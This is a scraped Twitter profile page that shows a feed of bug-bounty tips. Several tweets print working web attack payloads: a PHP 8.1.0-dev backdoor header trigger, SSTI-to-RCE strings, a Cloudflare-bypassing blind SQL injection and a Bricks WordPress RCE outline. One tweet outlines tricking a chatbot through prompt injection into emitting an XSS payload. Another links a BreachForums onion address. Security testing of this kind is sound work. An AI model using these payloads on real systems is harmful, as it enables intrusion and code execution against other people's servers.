Ismail (@ismailpy_crypto) 's Twitter Profile

ID: 1426689471278460931

14-08-2021 23:37:48

269 Tweet

29 Followers

334 Following

VIEH Group (@viehgroup)

If you find PHP 8.1.0-dev then try RCE & SQLi
User-Agentt: zerodiumsleep(5);
User-Agentt: zerodiumsystem('id'); 

#bugbounty #bugbountytips #rce #sqli #cybersecurity
NullSecX (@nullsecurityx)

🧠 SSTI → Remote Code Execution
1️⃣ App renders user input in template engine
2️⃣ Attacker sends payload: {{7*7}}
3️⃣ Output: 49 → confirms injection
4️⃣ Escalates to: {{self._globals.os.popen('id').read()}}
🎯 Full RCE via template context
#bugbounty #ssti #rce #infosec
Dark Web Informer - Cyber Threat Intelligence (@darkwebinformer)

BreachForums has possibly returned at their original Onion address with what looks like its original data.

I verified the Canary with the PGP and it is valid.

http://breached26tezcofqla4adzyn22notfqwcac7gpbrleg4usehljwkgqd[.]onion
InfoSec Community (@infoseccomm)

🚨 New Writeup Alert! 🚨 "I Automated CSP Extraction and Mapped 100+ Subdomains" by Ibtissam hammadi is now live on IW! Check it out here: infosecwriteups.com/adf04880ea5d #cybersecurity #infosec #csp #reconnaissance #bugbounty

Mike Takahashi (@taksec)

XSS via Prompt Injection 💥🧠🔓
🤖 Find a chatbot
🧠 Ask what model it is
🔁 Get it to repeat text
⚠️ Make it say: '"><img src=x onerror=alert()>
💥 Escalate to Reflected/Stored XSS via URL param
VIEH Group (@viehgroup)

Insecure Direct Object Reference (IDOR) Checklist 

credit : sylvain prevost
#bugbounty #bugbountytips #bughunting #penetrationtesting #pentesting #pentest #ethicalhacking #hacking #cybersecuritytips #cybersecurity #informationsecurity #infosec #bugcrowd #bugbountytips #bugbounty
VIEH Group (@viehgroup)

Cloudflare 403 bypass to time-based blind SQLi:
PL: (select(0)from(select(sleep(10)))v) → 403
but PL: (select(0)from(select(sleep(6)))v)/*'%2B(select(0)from(select(sleep(6)))v)%2B'%5C"%2B(select(0)from(select(sleep(6)))v) → Time-based Blind SQLi  
#BugBounty #SQLi
VIEH Group (@viehgroup)

Find the origin servers of websites protected by Cloudflare, Sucuri, or Incapsula with a misconfigured DNS. ⚔️ 
- github.com/MrH0wl/Cloudma… 

Credit: Md Ismail Šojal 🕷️
#infosec #bugbountytips #Cybersecurity
Dark Web Informer - Cyber Threat Intelligence (@darkwebinformer)

Misconfig Mapper: A fast tool to help you uncover security misconfigurations on popular third-party services used by your company and/or bug bounty targets

GitHub: github.com/intigriti/misc…
Ahmed Abdel Rasoul🐦‍⬛ (@0xbartita)

I just published a new writeup about Authentication Bypass vulnerability on coinmarketcap. 0xbartita.medium.com/how-i-found-an… #bugbountytips #bugbountytip

ProjectDiscovery (@pdiscoveryio)

Define the depth of your crawl with katana's -d flag.

The higher the depth, the more recursive crawls and juicy data you get! 🤤

⚠️ Higher depths can lead to long crawl times against large web applications.
Arshiya (@arshiyaiha)

10 common JavaScript coding vulnerabilities
Practical code examples.🐞💻
1- Open Redirect
2- SSRF
3- Timing Attacks
4- prototype pollution
5- NoSQLi
6- ReDoS
7- misconfiguration
8- Hard Code Vulnerability
9- mass assignment
10- Host Header Injection
#BugBountyTip youtube.com/watch?v=ypNKKY…

Muqsit 𝕏 (@mqst_)

💉 Complete Guide: The SQL Injection Knowledge Base

Website: websec.ca/kb/sql_injecti…

author: Roberto Salgado

#infosec
Md Ismail Šojal 🕷️ (@0x0sojalsec)

Someone made a subdomains database containing 1.6 billion subdomains scraped from multiple public (and private) sources.
 
This database is now public and FREE and can be queried on the following website.

- dash.pugrecon.celes.in

#infosec #cybersec #bugbountytips
𝕏 Bug Bounty Writeups 𝕏 (@bountywriteups)

JShunter

JShunter is a command-line tool designed for analyzing JavaScript files and extracting endpoints. This tool specializes in identifying sensitive data, such as API endpoints and potential security vulnerabilities, making it an essential resource for developers, bug
NullSecX (@nullsecurityx)

Unauth RCE in Bricks ≤1.9.6

The /bricks-api/import endpoint allows unauthenticated template imports; attacker-controlled JSON can carry PHP/payloads that the render_element routine processes in an eval‑like manner, resulting in full RCE.
 #WordPress #RCE #BugBounty
👑 OFJAAAH 👑 (@ofjaaah)

Use NextJS? Recon ✨

A quick way to find "all" paths for Next.js websites:
DevTools->Console

console.log(__BUILD_MANIFEST.sortedPages)

javascript:console.log(__BUILD_MANIFEST.sortedPages.join('\n'));

Cred = linkedin.com/in/0xsojalsec?…

#infosec #cybersec #bugbountytips
VIEH Group (@viehgroup)

🔥SSTI to RCE in URL

POC: target.com/docs/1.0/123 = not found
target.com/docs/1.0/?123 = now reflecting in source code like /docs/1.0/?123#
target.com/docs/1.0/?{{7*7}} = /docs/1.0/?49#

☑️ RCE: /docs/1.0/?{{phpinfo()}}

#infosec #bugbounty #bugbountytips